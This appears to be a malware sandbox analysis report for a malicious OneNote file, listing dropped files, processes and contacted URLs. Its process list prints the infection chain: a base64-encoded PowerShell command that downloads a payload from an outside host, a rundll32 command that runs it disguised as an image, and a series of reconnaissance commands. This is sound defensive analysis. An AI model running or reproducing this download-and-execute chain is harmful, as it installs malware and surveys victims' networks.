JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{3F64AFE5-8238-4ADA-AF99-9248C7A11722}

PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{405138B0-4D2C-4E8E-B63A-7E6F923A97D7}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{40E1C6FA-DBA0-4A69-9198-A13AD0169E06}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{425363FA-2F36-47B8-BA6E-D85865491C9A}

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3

dropped

C:\Users\user\AppData\Local\Temp\{425A0D32-83E5-48DC-A3A1-FB78E8004704}

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3

dropped

C:\Users\user\AppData\Local\Temp\{4A5F81B1-6EDC-4CFB-B0CD-453CC13CDCF8}

data

dropped

C:\Users\user\AppData\Local\Temp\{4BA3B8EA-997A-4C53-A890-252850AC82E0}

PNG image data, 88 x 574, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{4F77B4C2-CBE3-4EFA-8217-B8F83A812D3A}

PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{50E7BE13-3F2D-4259-8574-FB4059354854}

ASCII text, with very long lines (380), with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\{523537F5-238A-42F4-9ACD-3ACB2F2F6622}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{5263DCB2-3486-40DF-B136-195E04DB7FF8}

data

dropped

C:\Users\user\AppData\Local\Temp\{5A2868A1-8DE0-442E-8D6F-97928FFB4922}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{5A5E8107-CE6B-4914-BC2D-1AAAEF8E1591}

PNG image data, 171 x 552, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{5FA0CF7B-F7C2-42AC-B5D3-4E8AB4B60317}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{62465692-924B-45EF-A7D5-9F49AEBC2043}

data

dropped

C:\Users\user\AppData\Local\Temp\{63F968EA-4ED0-4F2C-91B9-3FDEE78F659B}

dropped

C:\Users\user\AppData\Local\Temp\{643A169F-1F1A-4582-862B-D9A44880C51F}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{656845EC-250E-47C5-A969-FB4CAC16FAFB}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{66452320-E51F-4E77-BCAE-CA1644AF361D}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{66F8E1E8-1369-43C4-916F-A009D3D7AF75}

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{671D2CE2-9423-4A23-8465-65D0C8CF260D}

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{698A08B9-E475-4CC1-88C7-580EA14B9349}

PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{6A897BE4-FB5A-43D2-8229-57B612A04132}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{6B25EA45-893F-4C96-8169-EEA21082E5E3}

data

dropped

C:\Users\user\AppData\Local\Temp\{6C21ADB4-847D-4D6F-93E0-2C0A883EFD8C}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{74F30B68-90E0-4B73-BC01-8B51887B4806}

data

dropped

C:\Users\user\AppData\Local\Temp\{790F52B3-3907-4DC9-A9A1-948DE526378E}

data

dropped

C:\Users\user\AppData\Local\Temp\{794F75FF-170B-472A-94C7-56FF3681C2F2}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{7AEF5561-F3C9-4229-BAF8-BF781FC20CDF}

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3

dropped

C:\Users\user\AppData\Local\Temp\{7D772901-F966-4FD4-BB78-9F4AAF7EA151}

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3

dropped

C:\Users\user\AppData\Local\Temp\{7DB5FBCB-7EF0-4946-A08F-D69FFD2F6705}

data

dropped

C:\Users\user\AppData\Local\Temp\{7ECE665E-C7EA-461A-8248-4760A309D2C1}

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3

dropped

C:\Users\user\AppData\Local\Temp\{802F69C8-6BC5-4D92-97B4-24E4C9F7CFA9}

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3

dropped

C:\Users\user\AppData\Local\Temp\{80CBF155-24CF-44C0-A386-520E4E9EE22A}

PNG image data, 30 x 700, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{8262CAC0-9831-4BAD-B4BE-84A53F9B6CA1}

data

dropped

C:\Users\user\AppData\Local\Temp\{83B486FB-2911-491A-B4B9-EEC047DBF31D}

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3

dropped

C:\Users\user\AppData\Local\Temp\{86829F54-A115-4199-A896-D068FEEB2825}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{8AF9B1F3-C206-4450-B6CE-5687CB4D5DC1}

data

dropped

C:\Users\user\AppData\Local\Temp\{8D3D6E67-5E01-41E7-BDD2-78D9BEEFC613}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{8E55B46B-2135-4BC1-A89C-1129556E99A6}

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3

dropped

C:\Users\user\AppData\Local\Temp\{904376E8-0B24-4BAA-A56B-E04B895FC890}

PNG image data, 39 x 579, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{93BA39AC-C354-446F-BCF0-1FFF8F16F612}

PNG image data, 50 x 556, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{95BD3EE4-F44A-47CE-84DD-AFD0B35255C1}

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3

dropped

C:\Users\user\AppData\Local\Temp\{9A4C8706-CAFA-4A10-9B8B-8F257E83A5A8}

data

dropped

C:\Users\user\AppData\Local\Temp\{9AAE0628-5C69-4E63-ACEF-E3367519506A}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{9ABA93A9-1B57-413A-8970-3181C7AC7C1F}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{9BAFE8E6-FE02-422B-9FEB-2E0476802FD6}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{9C0E3EDC-F67C-48B8-9CC4-4DD89EB7FB0E}

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3

dropped

C:\Users\user\AppData\Local\Temp\{9DAE3C16-8870-474D-949F-F29DFCE47C8C}

PNG image data, 77 x 627, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{9DB9AA5F-D7E0-4774-B63D-4A63ADCFD69C}

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3

dropped

C:\Users\user\AppData\Local\Temp\{9F93690B-59A6-44ED-94D5-763AB6DDF165}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{A12D6A2F-B10D-4059-8326-3A43C273D855}

Windows Enhanced Metafile (EMF) image data version 0x10000

dropped

C:\Users\user\AppData\Local\Temp\{A4BA9D0D-43CE-4486-B065-4E0B23506F43}

data

dropped

C:\Users\user\AppData\Local\Temp\{A6536237-145B-4C63-8ADF-895CBDB36188}

PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{AC311F2C-93C2-414E-843C-C2B372637087}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{AC4A94B6-ABA5-4A65-9430-DB427CC56BD4}

data

dropped

C:\Users\user\AppData\Local\Temp\{B1DC8E43-2F93-46C6-90E6-6590A044DA7E}

Windows Enhanced Metafile (EMF) image data version 0x10000

dropped

C:\Users\user\AppData\Local\Temp\{B67FCE44-31CB-4289-8F97-0FFAABD58DD4}

data

dropped

C:\Users\user\AppData\Local\Temp\{BFB75A52-A988-4BA5-9145-4E46DC25B8FE}

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3

dropped

C:\Users\user\AppData\Local\Temp\{C1C22178-D10F-468F-AD75-5363287D6B7D}

PNG image data, 39 x 600, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{C265361C-7CFC-477A-92BD-FE5B21DA13D3}

PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{C4DA6D4A-B2E8-46EE-83B4-751399F7D399}

data

dropped

C:\Users\user\AppData\Local\Temp\{C6ED19D4-DB09-42D3-B044-4C176B28C1D6}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{C888406B-E53E-49D1-B635-6ACC5754D5B5}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{CEC72066-FE14-4BC5-9D0D-E30DABE7CCEE}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{CF64C056-B428-4A6C-9E03-F7355C5C1A6E}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{CF9FB3D3-D732-4D4B-BF43-E1CE3B921B4F}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{D01D9708-5C50-4129-A9A9-75CA9E1303ED}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{D17C8CEF-30F3-4398-A0F9-52071B6509C0}

PNG image data, 50 x 500, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{D1AF5263-2413-43E3-A97C-77118784F8D0}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{D2178244-2503-4BF3-BAA6-09369A9C9FF4}

PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{D5373C65-FEF7-49F3-A610-ABCC64C5FEAC}

dropped

C:\Users\user\AppData\Local\Temp\{D62A929F-A51B-41E4-9EA0-5ADDC8DDA93D}

PNG image data, 50 x 600, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{D788972F-D017-4825-AC07-009CB077DB2C}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{D8260743-371B-4B83-A123-F760EB8232BB}

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{DA4A696F-4046-438A-AAA2-5DBB811CD485}

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3

dropped

C:\Users\user\AppData\Local\Temp\{DED5CA50-7359-4D1B-9D0B-F53BDEC8E9CA}

data

dropped

C:\Users\user\AppData\Local\Temp\{DEDB0522-28A1-447F-924D-11513955E414}

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3

dropped

C:\Users\user\AppData\Local\Temp\{E258B7CB-859B-4C4D-82FD-A5DEA9E048FA}

PNG image data, 60 x 336, 4-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{E7560F7E-E551-43DB-8FE7-A1F01374F259}

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3

dropped

C:\Users\user\AppData\Local\Temp\{E78A502F-F892-4D3D-8315-EEFF43AADE71}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{E93F7FAB-E6C6-48CE-9B6E-DA2DA9D74937}

data

dropped

C:\Users\user\AppData\Local\Temp\{EAC53E19-C64A-4614-BB2C-9A3763E5EA15}

data

dropped

C:\Users\user\AppData\Local\Temp\{ECAC551C-EFDB-427A-9107-146B5F903327}

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3

dropped

C:\Users\user\AppData\Local\Temp\{EFBB9DFB-AB65-4A11-B7EF-0AAB7DE81EB7}

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3

dropped

C:\Users\user\AppData\Local\Temp\{F13FF5DA-D642-44E2-B782-7F7E3C8EFEAF}

PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{F9990459-0C9A-48FC-90FF-2866B2AE8785}

PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{F9AC5C30-BD28-43E1-8EBF-51EBB1C86FFA}

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3

dropped

C:\Users\user\AppData\Local\Temp\{FAA22ECF-A433-44BF-BD71-C5B61F4ACDB4}

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Temp\{FB2889BE-1C4A-47B6-BE16-390DFBAF7F03}

PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{FDE6E5D6-0930-48B8-A342-49DEF203A57B}

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\1033\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Bibliography Styles\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Building Blocks\1033\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Building Blocks\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1bc9bbbe61f14501.customDestinations-ms (copy)

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1bc9bbbe61f14501.customDestinations-ms~RF33a521.TMP (copy)

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J28P3KPVQHINSX3VNNMO.temp

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JK4PDCTBXMJK198DMZ9I.temp

Matlab v4 mat-file (little endian) \253\373\277\272, sparse, rows 1, columns 0, imaginary

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, Sparse, ctime=Wed Sep 22 09:27:59 2021, mtime=Tue Feb 7 17:26:25 2023, atime=Wed Sep 22 09:27:59 2021, length=180528, window=hide

dropped

C:\Users\user\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2

data

dropped

C:\Users\user\Documents\OneNote Notebooks\My Notebook\Quick Notes.one

data

dropped

There are 721 hidden files, click here to show them.

Processes

Path

Cmdline

Malicious

C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\notes.one

C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE

/tsr

C:\Windows\System32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3N0YXJjb21wdXRhZG9yYXMuY29tL2x0MmVMTTYvMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg=='))

C:\Windows\System32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Invoke-WebRequest -URI https://starcomputadoras.com/lt2eLM6/01.gif -OutFile C:\programdata\putty.jpg

C:\Windows\System32\rundll32.exe

rundll32 C:\programdata\putty.jpg,Wind

C:\Windows\SysWOW64\rundll32.exe

rundll32 C:\programdata\putty.jpg,Wind

C:\Windows\SysWOW64\backgroundTaskHost.exe

C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE

"C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE" /tsr

C:\Windows\SysWOW64\net.exe

net view

C:\Windows\SysWOW64\cmd.exe

cmd /c set

C:\Windows\SysWOW64\ARP.EXE

arp -a

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /all

C:\Windows\SysWOW64\net.exe

net share

C:\Windows\SysWOW64\NETSTAT.EXE

netstat -nao

C:\Windows\SysWOW64\net.exe

net localgroup

C:\Windows\SysWOW64\whoami.exe

whoami /all

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 share

C:\Windows\SysWOW64\ROUTE.EXE

route print

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

There are 23 hidden processes, click here to show them.

URLs

Name

Malicious

https://shell.suite.office.com:1443

unknown

https://autodiscover-s.outlook.com/

unknown

https://www.youtube.com/user/cisco

unknown

https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr

unknown

https://cdn.entity.

unknown

https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/

unknown

https://www.cisco.com/c/ar_ae/index.html

unknown

https://rpsticket.partnerservices.getmicrosoftkey.com

unknown

https://lookup.onenote.com/lookup/geolocation/v1

unknown

https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile

unknown

https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy

unknown

https://api.aadrm.com/

unknown

https://www.cisco.com/c/hu_hu/index.html

unknown

https://www.cisco.com/site/in/en/index.html

unknown

https://software.cisco.com/download/navigator.html

unknown

https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies

unknown

https://api.microsoftstream.com/api/

unknown

https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive

unknown

https://cr.office.com

unknown

https://www.cisco.com/c/en/us/partners/connect-with-a-partner.html

unknown

https://www.cisco.com/c/en/us/about/sitemap.html

unknown

https://learninglocator.cloudapps.cisco.com/#/home

unknown

https://www.cisco.com/c/pl_pl/index.html

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

https://res.getmicrosoftkey.com/api/redemptionevents

unknown

https://tasks.office.com

unknown

https://officeci.azurewebsites.net/api/

unknown

https://my.microsoftpersonalcontent.com

unknown

https://www.cisco.com/site/au/en/index.html

unknown

https://store.office.cn/addinstemplate

unknown

https://www.cisco.com/c/en/us/about/case-studies-customer-success-stories/nfl-superbowl-lvi.html#%7E

unknown

https://www.cisco.com/c/es_ec/index.html

unknown

https://messaging.engagement.office.com/

unknown

https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech

unknown

https://www.cisco.com/c/de_de/index.html

unknown

https://www.cisco.com/c/en/us/about.html

unknown

https://www.odwebp.svc.ms

unknown

https://api.powerbi.com/v1.0/myorg/groups

unknown

https://web.microsoftstream.com/video/

unknown

https://api.addins.store.officeppe.com/addinstemplate

unknown

https://search.cisco.com/search?query=

unknown

http://schema.org/ImageObject

unknown

https://graph.windows.net

unknown

https://www.cisco.com/c/it_it/index.html

unknown

https://consent.config.office.com/consentcheckin/v1.0/consents

unknown

https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices

unknown

https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json

unknown

https://www.cisco.com/c/ja_jp/index.html

unknown

https://d.docs.live.net

unknown

https://ncus.contentsync.

unknown

https://www.cisco.com/c/en_hk/index.html

unknown

https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/

unknown

http://weather.service.msn.com/data.aspx

unknown

https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios

unknown

https://www.cisco.com/c/da_dk/index.html

unknown

https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml

unknown

https://pushchannel.1drv.ms

unknown

https://wus2.contentsync.

unknown

https://clients.config.office.net/user/v1.0/ios

unknown

https://o365auditrealtimeingestion.manage.office.com

unknown

https://outlook.office365.com/api/v1.0/me/Activities

unknown

https://www.cisco.com/c/es_mx/index.html

unknown

https://www.cisco.com/c/fr_be/index.html

unknown

